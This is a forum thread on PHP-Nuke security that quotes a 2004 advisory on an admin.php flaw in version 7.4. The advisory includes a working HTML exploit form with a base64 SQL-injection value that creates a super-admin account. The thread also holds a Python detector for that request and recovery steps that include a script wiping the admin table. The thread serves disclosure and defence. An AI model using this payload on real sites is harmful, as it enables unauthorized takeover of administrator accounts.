Reporting Nuke vulnerabilities and how to counter them

guilanict

Member
Many topics may already have been opened on this subject, but this time I would like to ask all friends who work in security to share their information in this topic, so that Nuke-based sites can in some way protect themselves against hacker attacks.
Today a dear friend reported this vulnerability, the full text of which you can see below:

Code:
PHP-Nuke Authentication Flaw in 'admin.php' Lets Remote Users Gain Administrative Privileges 
   
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Sep 5 2004 
 
Impact:  Modification of user information, User access via network
 
Exploit Included:  Yes   
 
Version(s): 7.4 
 
Description:  An authentication vulnerability was reported in PHP-Nuke in the 'admin.php' script. A remote user can create a user account that has administrative privileges. 

CODEBUG Labs reported that a remote user can submit a specially crafted POST request to 'admin.php' to add a user account and grant administrative privileges to that user account.

A demonstration exploit HTTP form is provided:

<form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
<p>USERNAME: 
<input type="text" name="add_aid">
<br>
NOME: 
<input type="text" name="add_name">
<br>
PASSWORD: 
<input type="text" name="add_pwd">
<br>
E-MAIL: 
<input type="text" name="add_email">
<br>
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="AddAuthor">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>

The original advisory is available at:

http://www.mantralab.org/modules.php/modulo/news/lanotizia/%5BXSS%5D+Remote+privilege+escalation+in+PHP-Nuke+7.4 
 
Impact:  A remote user can add an administrative account to gain administrative access to PHP-Nuke on the target system.
 
Solution:  No solution was available at the time of this entry.
 
Vendor URL:  www.phpnuke.org/
 
Cause:  Authentication error 
 
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
 
Reported By:  Pierquinto Manco <[email protected]>
 
Message History:   None.
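
A detection sketch for the request the advisory describes, added here as an example and not part of the original post or of PHP-Nuke: it flags POSTs to admin.php whose admin field base64-decodes to SQL syntax, as the hidden field in the form above does. The function names, the marker list and the sample requests are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs

# SQL fragments that should never appear inside a decoded 'admin' value (assumed list).
SQL_MARKERS = re.compile(r"'|/\*|--|\b(?:union|select)\b", re.IGNORECASE)

def decode_admin(value):
    """Base64-decode an 'admin' value; return None when it is not valid base64."""
    # parse_qs turns '+' into a space, so restore it before decoding.
    try:
        raw = base64.b64decode(value.replace(" ", "+"), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("latin-1")

def inspect_request(method, path, body):
    """Return findings for one logged request; an empty list means nothing matched."""
    if method != "POST" or not path.split("?", 1)[0].endswith("/admin.php"):
        return []
    params = {k: v[-1] for k, v in parse_qs(body, keep_blank_values=True).items()}
    findings = []
    if "admin" in params:
        decoded = decode_admin(params["admin"])
        if decoded is None:
            findings.append("admin field is not valid base64")
        elif SQL_MARKERS.search(decoded):
            findings.append("admin field decodes to SQL syntax: %r" % decoded)
    # Account creation with super-admin rights only matters here when the
    # credential field in the same request already looks forged.
    if findings and params.get("op") == "AddAuthor" and params.get("add_radminsuper") == "1":
        findings.append("AddAuthor with add_radminsuper=1 in the same request")
    return findings

# Constructed sample requests (method, path, urlencoded body), not real log data.
SAMPLES = [
    ("POST", "/admin.php", "add_aid=newadmin&add_name=n&add_pwd=p&add_email=e%40example.org"
     "&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox&add_radminsuper=1&op=AddAuthor"),
    ("POST", "/admin.php", "add_aid=editor&add_name=n&add_pwd=p&add_email=e%40example.org"
     "&add_radminsuper=0&op=AddAuthor"),
    ("POST", "/admin.php", "admin=%27+OR+1%3D1&op=AddAuthor&add_radminsuper=1"),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        print(method, path, inspect_request(method, path, body) or "clean")
```

The check needs the POST body, which default web-server access logs do not record, so it has to run where request bodies are visible.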
 

guilanict

Member
And here is the NukeCops admin's guidance for when you have been hacked: :)
Code:
New unauthorized admin account has been created 

Run your database tool (e.g. phpMyAdmin). 

Open the database that holds the PHP-Nuke tables. In phpMyAdmin, it is listed in the left side panel. 

Open the {nuke}_authors table, replacing {nuke} with your actual $prefix name defined in config.php. 

Delete all records listed in this table. 

Close/logout from your database tool. 

Go to your site and run admin.php. 

When prompted, enter new admin account (admin nick, name, password, email, etc). 

Done. 


If you have no database tool or have no idea how to use it, create the script below and save it as emptyadmins.php, then upload it to your PHP-Nuke root directory. 
Code: 
<?php 
// mainfile.php loads config.php ($prefix) and the database layer ($db).
require_once("mainfile.php"); 
if (!isset($prefix)) die('config.php not loaded properly.'); 
if (!isset($db)) die('database layer not loaded properly.'); 

// Remove every row from the administrators table, {prefix}_authors.
$sql = "DELETE FROM " . $prefix . "_authors"; 
$result = $db->sql_query($sql); 
if ($result) { 
  echo "All administrator accounts has been removed.<br/>"; 
  echo "Now run admin.php to create new admin account."; 
} else { 
  echo "Unable to access to database."; 
} 
?> 

Then, run this script from your browser, e.g: 
Code: 
http://mysite.com/emptyadmins.php 

 Remove/delete the script when no longer needed.  


My index.php has been tampered with or is showing a hacker message 

Login as admin, and go to PHP-Nuke administration menu. 

Click on "Messages" icon. 

Check every site message by clicking on the "edit" link. 

Remove any unnecessary message text, or delete the message. 

Done. 



A frame is shown at the bottom of my site's page 

Login as admin, and go to PHP-Nuke administration menu. 

Click on "Preferences" icon. 

Remove any unnecessary foot text. 

Done. 



One or more of your script files have changed 

Replace the modified file with the original one on your local machine. 

Patch or upgrade any of your modules that contain an upload feature. 



Securing PHP-Nuke 

Apply patches for your current PHP-Nuke version. (nukesecurity resources) 

Install one or more PHP-Nuke security add-ons: (in alphabetical order) 

Admin Secure, Forums: home, nukecops 

Fortress, Forums: computercops, nukecops 

Protector System, Forums: home, nukecops 

NSN Sentinel, Forums: home, nukegalaxy, nukecops 



Check for the Hacker Assassins PHP-Nuke combo package that ships with the latest ChatServ patches and some security add-ons. 

Keep watching the Waraxe Forum for PHP-Nuke exploits. 

Visit some security sites such as Security Tracker, Security Focus, and Secunia for the latest advisories regarding PHP-Nuke exploits and vulnerabilities. 

Keep monitoring for new and upcoming PHP-Nuke exploits and vulnerabilities. 



Which security add-on is best suited to my site? 
KGuske has a comparison table for common PHP-Nuke security add-ons. 
Visit this link for more details: http://www.freesoftwarereviews.org/modules.php?name=News&file=article&sid=2
 
